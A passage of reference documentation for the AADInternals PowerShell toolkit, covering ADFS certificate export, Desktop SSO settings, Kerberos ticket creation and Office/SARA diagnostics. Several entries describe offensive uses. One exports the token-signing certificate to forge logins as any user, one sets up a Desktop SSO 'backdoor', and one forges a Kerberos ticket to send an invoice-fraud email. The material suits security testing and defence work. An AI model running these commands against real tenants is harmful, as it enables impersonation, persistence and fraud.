Remember to restart the sync service: Restart-Service ADSync

New-AADIntADFSSelfSignedCertificates (*)

Since version 0.2.3
Disables certificate auto rollover and creates new self-signed Token Signing and Token Decrypt certificates for ADFSService. The created certificates are copies of existing certificates, except that they are valid for 10 years. Certificates are added to ADFS and the service is restarted. Certificates are also exported to the current directory.

Default password for exported .pfx files is “AADInternals”

Note! If there are multiple ADFS servers, certificates MUST be imported to each server’s Local Machine Personal store and read access to private keys for the ADFS service accounts must be assigned. Also, the ADFS service needs to be restarted.

Don’t forget to update certificate information to Azure AD using Update-AADIntADFSFederationSettings

Example:

# Create new certificates
New-AADIntADFSSelfSignedCertificates

Restore-AADIntADFSAutoRollover (*)

Since version 0.2.3
Restores ADFS to “normal” mode: Token Signing and Token Decryption certificates are automatically rolled over once a year. Enables certificate auto rollover, updates Token Signing and Token Decryption certificates and removes the old self-signed certificates.

Note! If there are multiple ADFS servers the ADFS service needs to be restarted on each server.

Don’t forget to update certificate information to Azure AD using Update-AADIntADFSFederationSettings

Example:

# Restore the auto rollover mode
Restore-AADIntADFSAutoRollover

Update-AADIntADFSFederationSettings (A)

Since version 0.2.3
Updates federation information of the given domain to match the local ADFS server information.

Example:

# Update federation setting for domain company.com
Update-AADIntADFSFederationSettings -Domain company.com

Export-AADIntADFSSigningCertificate (*)

Since version 0.2.5
This function exports the ADFS token signing certificate. Must be run on ADFS server as domain admin or ADFS service account.

The certificate can be used to create valid SAML tokens to login in as any user of the tenant.

Example:

# Export ADFS token signing certificate
Export-AADIntADFSSigningCertificate -filename ADFSSigningCertificate.pfx

Export-AADIntADFSEncryptionCertificate (*)

Since version 0.2.5
This function exports the ADFS token encryption certificate. Must be run on ADFS server as domain admin or ADFS service account.

The certificate can be used to encrypt SAML tokens.

Example:

# Export ADFS token encryption certificate
Export-AADIntADFSEncryptionCertificate -filename ADFSEncryptionCertificate.pfx

Get-AADIntDesktopSSO (P)

Since version 0.2.6
Shows the Desktop SSO (a.k.a. Seamless SSO) status of the tenant.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : 
Enabled      : False
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Enables or disables DesktopSSO.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO
Set-AADIntDesktopSSOEnabled -AccessToken $pt -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : 
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Sets DesktopSSO information for the given domain. In other words, you can create a backdoor! It can also be used to change the password of the existing DesktopSSO configuration to AzureAD and to reset the password of the computer account used for SSO (default is AZUREADSSOACC).

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO for the given domain
Set-AADIntDesktopSSO -AccessToken $pt -DomainName company.com -Password "mypassword" -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : company.com
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

New-AADIntKerberosTicket

Since version 0.2.6
This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user’s SID and server password.

User SID can be given as a SID object, SID string, or UserPrincipalNane (UPN). If UPN is given, SID is searched from AD or AAD. For AD, the user running the command need to have read access to AD. For AAD, an access token for Azure AD Graph needs to be given.

Note! The Kerberos ticket is valid only for a couple of minutes!

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Get an access token for Exchange Online
$et=Get-AADIntAccessTokenForEXO -KerberosTicket $kt -Domain company.com

# Send an email using Outlook API
Send-AADIntOutlookMessage -AccessToken $et -Recipient "accounting@company.com" -Subject "Invoice" -Message "Pay the attached invoice <b>ASAP!</b>"

Client functions

Get-AADIntOfficeUpdateBranch

Since version 0.2.4
This function shows the update branch (currently called channel) of the Office.

Example:

# Get Office update branch
Get-AADIntOfficeUpdateBranch

Output:

Update branch: Current

Set-AADIntOfficeUpdateBranch

Since version 0.2.4
This function sets the update branch (currently called channel) of the Office. Must run as administrator.

Branch Channel Notes
InsiderFast Weekly builds, not generally supported
FirstReleaseCurrent Preview of the current
Current Monthly Monthly updates
FirstReleaseDeferred Semi-Annual (Targeted) Preview of the deferred (March and September)
Deferred Semi-Annual Semi-annual updates (January and July)
DogFood Only for Microsoft employees

Example:

# Get Office update branch
Set-AADIntOfficeUpdateBranch -UpdateBranch InsiderFast

Output:

Update branch: InsiderFast

Support and Recovery Assistant (SARA)

Get-AADIntSARAUserInfo

Since version 0.2.4
This function gets user information using Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and problem shooting. The analysis is run at MS diagnostic server and can take up to 30 seconds.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARAUserInfo -AccessToken $at

Output:

Retrieving information..
Retrieving information..
Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.GetUserAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets, Version=16.0.3144.0, Culture=
                        neutral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Attempting to get information about user "user@company.com".
StartTime             : 2019-07-08T12:29:40.4911399Z
Duration              : 00:00:51.1166849
CoreDuration          : 00:00:51.1166849
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : Extracting information about Office 365 user is completed.
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserComplete
UserMessage           : Successfully got the user information for "user@company.com".
UserMessageId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.ExchangeCmdlets.StringsGetUserSuccessDesc
AdminMessage          : 
SupportMessage        : 
IsMessageShown        : False
GenericInfo           : 
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : d5b4c239-7619-4367-9ccb-e9fe2fe01e23

DisplayName               : Demo USer
FirstName                 : Demo
Guid                      : 67a93665-decb-4058-b42a-271d41c47c61
Id                        : 
Identity                  : EURP185A001.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/demoo365life4.onmicrosoft.com/AdminO365life
IsDirSynced               : False
IsValid                   : True
LastName                  : User
MicrosoftOnlineServicesID : user@company.com
Name                      : DemoUser
NetID                     : 401320004BA7A415
RecipientType             : UserMailbox
RecipientTypeDetails      : UserMailbox
UserPrincipalName         : user@company.com
WindowsEmailAddress       : user@company.com
WindowsLiveID             : user@company.com
IsHybridTenant            : False
Forest                    : EURP185.PROD.OUTLOOK.COM

Get-AADIntSARATenantInfo

Since version 0.2.4
This function gets tenant information using Microsoft Support and Recovery Assistant (SARA) API. Can help in diagnostics and problem shooting. The analysis is run at MS diagnostic server but should take only a second or two.

Example:

# Get user information
$at=Get-AADIntAccessTokenForSARA
Get-AADIntSARATenantInfo -AccessToken $at -AccessToken $at

Output:

Retrieving information..

AnalyzerName          : AnalysisRule, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.TenantUserInfoAnalyzer, Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo, Version=16.0.3144.0, Culture=neu
                        tral, PublicKeyToken=31bf3856ad364e35
AnalyzerDesc          : Checking your tenant and account information.
StartTime             : 2019-07-08T12:31:06.1602586Z
Duration              : 00:00:00.6250818
CoreDuration          : 00:00:00.6250818
WaitingDuration       : 00:00:00
TotalChildrenDuration : 00:00:00
TotalWaitingDuration  : 00:00:00
ParentId              : 00000000-0000-0000-0000-000000000000
Value                 : true
ResultTitle           : The licenses of your tenant and account are all good!
ResultTitleId         : Microsoft.Online.CSE.HRC.Analysis.Analyzers.TenantInfo.StringsGetTenantInfoSuccess
UserMessage           : 
UserMessageId         : 
AdminMessage          : 
SupportMessage        : <Setup><ProductId>O365ProPlusRetail</ProductId><ReleaseTrack>False</ReleaseTrack></Setup>
IsMessageShown        : False
GenericInfo           : User Puid is not null or empty.OrgIg_User<TenantUserInfo><IsLicensed>True</IsLicensed><ProvisioningStatus>PendingInput</ProvisioningStatus><PreferredLanguage>en</PreferredLanguage/>
                        <ValidationStatus>Healthy</ValidationStatus><ReleaseTrack>Other</ReleaseTrack><LicenseInformations><LicenseInformation><SKUPartNumber>SPE_E5</SKUPartNumber><ServiceStatus><ServiceTy
                        pe>Exchange</ServiceType><ServiceName>INFORMATION_BARRIERS</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Micro
                        softKaizala</ServiceType><ServiceName>KAIZALA_STANDALONE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Bing</S
                        erviceType><ServiceName>MICROSOFT_SEARCH</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><
                        ServiceName>PREMIUM_ENCRYPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WhiteboardServices</ServiceType><ServiceName>
                        WHITEBOARD_PLAN3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP2</ServiceName>
                        <ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MIP_S_CLP1</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>MYANALYTICS_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Servic
                        eStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>PAM_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>To-Do<
                        /ServiceType><ServiceName>BPOS_S_TODO_3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>ProcessSimple</ServiceType><ServiceN
                        ame>FLOW_O365_P3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>PowerAppsService</ServiceType><ServiceName>POWERAPPS_O365_P
                        3</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>OfficeForms</ServiceType><ServiceName>FORMS_PLAN_E5</ServiceName><Provisio
                        ningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>Disabled</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftStream</ServiceType><ServiceName>STREAM_O365_E5</ServiceName><ProvisioningStatus>Success</ProvisioningStatus>
                        </ServiceStatus><ServiceStatus><ServiceType>Deskless</ServiceType><ServiceName>Deskless</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><
                        ServiceType>Exchange</ServiceType><ServiceName>THREAT_INTELLIGENCE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Teamspace
                        API</ServiceType><ServiceName>TEAMS1</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>WindowsDefenderATP</ServiceType><Servic
                        eName>WINDEFATP</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Windows</ServiceType><ServiceName>WIN10_PRO_ENT_SUB</Service
                        Name><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>
                        Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus>Disabled</Provis
                        ioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceSta
                        tus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><Se
                        rviceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</Ser
                        viceType><ServiceName>INTUNE_A</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>
                        AAD_PREMIUM</ServiceName><ProvisioningStatus>Disabled</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>YammerEnterprise</ServiceType><ServiceName>YAMMER_ENTERPRISE</S
                        erviceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Sway</ServiceType><ServiceName>SWAY</ServiceName><ProvisioningStatus>Success</
                        ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTWAC</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Serv
                        iceStatus><ServiceStatus><ServiceType>SharePoint</ServiceType><ServiceName>SHAREPOINTENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><Service
                        Status><ServiceType>ProjectWorkManagement</ServiceType><ServiceName>PROJECTWORKMANAGEMENT</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus
                        ><ServiceType>MicrosoftOffice</ServiceType><ServiceName>OFFICESUBSCRIPTION</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>M
                        icrosoftCommunicationsOnline</ServiceType><ServiceName>MCOSTANDARD</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Microsoft
                        CommunicationsOnline</ServiceType><ServiceName>MCOMEETADV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MicrosoftCommunica
                        tionsOnline</ServiceType><ServiceName>MCOEV</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceNa
                        me>LOCKBOX_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_O365</ServiceName
                        ><ProvisioningStatus>PendingActivation</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_ENTERPRISE</ServiceName><Provisi
                        oningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_ANALYTICS</ServiceName><ProvisioningStatus>Success</P
                        rovisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EQUIVIO_ANALYTICS</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></Ser
                        viceStatus><ServiceStatus><ServiceType>PowerBI</ServiceType><ServiceName>BI_AZURE_P2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><Ser
                        viceType>Exchange</ServiceType><ServiceName>ATP_ENTERPRISE</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>Adall
                        om</ServiceType><ServiceName>ADALLOM_S_O365</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus></LicenseInformation><LicenseInformation><SKUPartNumber
                        >EMSPREMIUM</SKUPartNumber><ServiceStatus><ServiceType>Exchange</ServiceType><ServiceName>EXCHANGE_S_FOUNDATION</ServiceName><ProvisioningStatus>PendingProvisioning</ProvisioningSta
                        tus></ServiceStatus><ServiceStatus><ServiceType>AzureAdvancedThreatAnalytics</ServiceType><ServiceName>ATA</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStat
                        us><ServiceStatus><ServiceType>Adallom</ServiceType><ServiceName>ADALLOM_S_STANDALONE</ServiceName><ProvisioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatu
                        s><ServiceType>RMSOnline</ServiceType><ServiceName>RMS_S_PREMIUM2</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline<
                        /ServiceType><ServiceName>RMS_S_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>RMSOnline</ServiceType><ServiceName>
                        RMS_S_ENTERPRISE</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>SCO</ServiceType><ServiceName>INTUNE_A</ServiceName><Provis
                        ioningStatus>PendingInput</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM_P2</ServiceName><ProvisioningStatus
                        >Success</ProvisioningStatus></ServiceStatus><ServiceStatus><ServiceType>MultiFactorService</ServiceType><ServiceName>MFA_PREMIUM</ServiceName><ProvisioningStatus>Success</Provision
                        ingStatus></ServiceStatus><ServiceStatus><ServiceType>AADPremiumService</ServiceType><ServiceName>AAD_PREMIUM</ServiceName><ProvisioningStatus>Success</ProvisioningStatus></ServiceS
                        tatus></LicenseInformation></LicenseInformations></TenantUserInfo>
Severity              : 2
OverridesChildren     : False
ProblemId             : 00000000-0000-0000-0000-000000000000
TimeCached            : 0001-01-01T00:00:00
SaraSymptomId         : 00000000-0000-0000-0000-000000000000
SaraWorkflowRunId     : 00000000-0000-0000-0000-000000000000
SaraSymptomRunId      : 00000000-0000-0000-0000-000000000000
SaraSessionId         : 00000000-0000-0000-0000-000000000000
Id                    : 81157ffa-d946-4bf8-8d6e-a391b96e4bf6
Dr Nestori Syynimaa avatar
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa holds MCSA (Office 365) and is Microsoft Certified Trainer.
comments powered by Disqus